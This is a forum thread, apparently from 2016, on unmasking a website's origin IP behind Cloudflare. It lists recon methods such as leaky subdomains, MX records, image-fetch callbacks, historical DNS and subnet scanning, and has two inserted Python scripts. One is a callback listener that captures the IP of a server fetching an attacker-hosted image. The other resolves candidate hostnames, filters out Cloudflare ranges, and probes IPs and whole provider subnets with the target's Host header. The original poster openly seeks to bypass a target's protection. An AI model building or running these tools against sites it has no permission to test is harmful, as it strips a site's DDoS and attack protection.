hotpockets Posted May 28, 2016 Hey, I was wondering if anyone here knew how to get past Cloudflare? I'm aware you can just get the original main IP, but that is hidden away, even when trying to bypass it using subdomains.
A200K Posted May 29, 2016 Depending on what software the server is running, there could be exploits, e.g. if they have some forum software where you can set your avatar by URL, the server will connect to it and it could reveal the actual server IP. If they have an HTTPS image proxy, post an image and the server will crawl it as well. I saw a lot of people who fail to set up CF properly, so you can still get the IP with a mail / other subdomain DNS entry, but I guess this won't be the case here, like you said.
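An added example, not code from the thread, for the avatar-by-URL / image-proxy leak A200K describes: a callback listener you run on a host you control. You submit http://<your-host>:<port>/avatar.gif as the avatar or image URL and log the source address of whatever comes to fetch it. The hostnames, ports and the hits fed to the helper functions are assumptions chosen for illustration.

```python
"""
Added example (not from the thread): out-of-band callback listener for the
"set avatar by URL" / image-proxy origin leak. Run on a host you control and
hand the target the URL of /avatar.gif. Port, path and sample hits are assumed.
"""
from collections import Counter
from http.server import BaseHTTPRequestHandler, HTTPServer

# Smallest valid GIF, so the fetching side accepts the response as an image
# and does not retry or fall back to a default avatar.
GIF_1X1 = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
           b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00"
           b"\x00\x02\x02D\x01\x00;")

HITS = []  # every fetch observed: {"src": ip, "path": ..., "ua": ...}


def record_fetch(src_ip, path, user_agent, hits=HITS):
    """Store one callback. The source address is the interesting part: when
    the site's own server fetched the image, this is its egress IP, which on
    a single-box setup is the origin hiding behind Cloudflare."""
    hit = {"src": src_ip, "path": path, "ua": user_agent}
    hits.append(hit)
    return hit


def distinct_sources(hits):
    """Source IPs seen, most frequent first, as (ip, count) pairs. Your own
    test fetches will show up here too, so compare against the addresses you
    used while submitting the URL."""
    return Counter(h["src"] for h in hits).most_common()


class CallbackHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        hit = record_fetch(self.client_address[0], self.path,
                           self.headers.get("User-Agent", "-"))
        print(f"fetch from {hit['src']} for {hit['path']} UA={hit['ua']}")
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(GIF_1X1)))
        self.end_headers()
        self.wfile.write(GIF_1X1)

    def log_message(self, fmt, *args):
        pass  # do_GET already prints the one line we care about


def serve(host="0.0.0.0", port=8080):
    """Block forever answering callbacks; HITS accumulates in memory."""
    HTTPServer((host, port), CallbackHandler).serve_forever()


if __name__ == "__main__":
    serve()
```

Use a unique path per submission (for example /avatar-<random>.gif) so you can tell which site, or which feature of the site, produced a given hit. The caveat A200K's post implies still applies: the source IP is only the origin if the fetch is made from the web server itself; a site that fetches through a separate worker, a proxy, or a Cloudflare-side feature will reveal that host's address instead, so always check the result against Cloudflare's published ranges before treating it as the origin.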
hotpockets Posted May 29, 2016 Author Some people make it sound so easy. They brag about being able to bypass Cloudflare and access the main server with ease.
A200K Posted May 29, 2016 4 hours ago, evo85 said: Some people make it sound so easy. They brag about being able to bypass Cloudflare and access the main server with ease. I wasn't bragging, I just told you the methods you COULD use to obtain the real server IP. If you would provide us the site URL, I could tell you what you could do there, as it really depends on the target, what software it is running, how it is configured, etc.
hotpockets Posted May 29, 2016 Author Ah, I was not referring to you at all. I was talking about other members/social media when I would google this topic.
cynent Posted June 12, 2016 A few main ways I do it:
- direct.site.com: this used to go to the original IP by default, and many people forgot to remove it. Cloudflare eventually caught onto this and changed it, but if it's a site that's been using CF for a while, they might still have this problem.
- Try looking for the mail server: dig site.com mx
- Check for non-plain-HTTP services like game servers, websocket servers, video or audio streams, etc., and see if any of those IPs work.
- Look for external grabbers, things that will download images from your own server, for example.
- Figure out what provider they use, if they mention it somewhere, then blast their whole provider's subnet, scanning until you find their webpage showing up when you send their Host header. This won't work if the admins actually configure it to only allow CF IPs, but many don't bother.
- Check if the site is on CloudFlare Watch, and check for historical IPs on DomainTools, etc.
- If all else fails, there are several tools available which can be used to bruteforce DNS to find hidden subdomains, which might often reveal an original IP.
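An added example, not code from the thread, that turns cynent's list into a script: resolve the apex plus the likely leaky names (direct, mail, and similar), keep every answer that is not in Cloudflare's published IPv4 ranges, then probe each candidate (or a whole provider subnet) with the site's Host header and a marker taken from the real page. The hostnames, IPs and HTTP responses used in the checks are constructed; the CLOUDFLARE_V4 list is a snapshot of Cloudflare's published ranges and should be refreshed from https://www.cloudflare.com/ips-v4 before use.

```python
"""
Added example (not from the thread): DNS triage plus Host-header origin probe
for the recon steps above. Sample records/responses are constructed.
"""
import http.client
import ipaddress
import socket

# Snapshot of https://www.cloudflare.com/ips-v4 (assumed current; refresh it).
CLOUDFLARE_V4 = [
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
]
CF_NETS = [ipaddress.ip_network(n) for n in CLOUDFLARE_V4]

# Names worth resolving besides the apex: the legacy "direct" record plus
# infrastructure names that admins most often leave pointing at the box itself.
CANDIDATE_PREFIXES = ["direct", "mail", "webmail", "smtp", "ftp", "cpanel",
                      "dev", "staging", "origin", "vpn"]


def is_cloudflare_ip(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CF_NETS)


def candidate_hostnames(domain):
    return [domain] + [f"{p}.{domain}" for p in CANDIDATE_PREFIXES]


def resolve_a(hostname):
    """Live A lookup (run `dig site.com mx` separately for mail exchangers)."""
    try:
        infos = socket.getaddrinfo(hostname, None, socket.AF_INET)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def triage(records):
    """records: {hostname: [ipv4, ...]} -> {ip: [hostnames]} for every
    address that is NOT a Cloudflare edge, i.e. a possible origin."""
    leaks = {}
    for host, ips in records.items():
        for ip in ips:
            if not is_cloudflare_ip(ip):
                leaks.setdefault(ip, []).append(host)
    return leaks


def http_fetch(ip, site, timeout=5):
    """GET / from `ip` while presenting the site's Host header.
    Returns (status, Server header, first 4 KiB of body)."""
    conn = http.client.HTTPConnection(ip, 80, timeout=timeout)
    try:
        conn.request("GET", "/", headers={"Host": site, "User-Agent": "origin-check/1.0"})
        resp = conn.getresponse()
        return resp.status, resp.getheader("Server", ""), resp.read(4096)
    finally:
        conn.close()


def probe_origin(ip, site, marker=b"", fetch=http_fetch):
    """Classify one candidate. `marker` is a byte string copied from the real
    (Cloudflare-fronted) page, e.g. its <title>, so a random vhost on a shared
    host is not mistaken for the origin. `fetch` is injectable for testing."""
    try:
        status, server, body = fetch(ip, site)
    except (OSError, http.client.HTTPException):
        # Nothing on :80, a dropped connection, or a firewall that only
        # admits Cloudflare's ranges all land here.
        return {"ip": ip, "verdict": "no-http"}
    if 200 <= status < 400 and marker in body:
        return {"ip": ip, "verdict": "likely-origin", "status": status, "server": server}
    if status == 403:
        # Answers, but not to us: the admin may allow only Cloudflare's IPs.
        return {"ip": ip, "verdict": "restricted", "status": status, "server": server}
    return {"ip": ip, "verdict": "other-site", "status": status, "server": server}


def scan_subnet(cidr, site, marker=b"", fetch=http_fetch):
    """The 'blast the provider's subnet with their Host header' step."""
    return [r["ip"] for r in (probe_origin(str(h), site, marker, fetch)
                              for h in ipaddress.ip_network(cidr).hosts())
            if r["verdict"] == "likely-origin"]


if __name__ == "__main__":
    import sys
    domain = sys.argv[1]
    records = {h: resolve_a(h) for h in candidate_hostnames(domain)}
    for ip, hosts in triage(records).items():
        print(ip, hosts, probe_origin(ip, domain)["verdict"])
```

The marker matters on shared hosting: without it, any server that answers 200 for an unknown Host header looks like a hit. The "restricted" verdict is the failure mode cynent mentions (the admin allows only Cloudflare's ranges); from the defender's side, that allowlist plus Cloudflare's Authenticated Origin Pulls is exactly what makes every step in this list stop working.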
Akalanka Posted March 29, 2018 https://medium.com/secure-hacker/bypass-cloudflare-protection-get-subdomains-ofa-website-2cb1d749c510 Try it.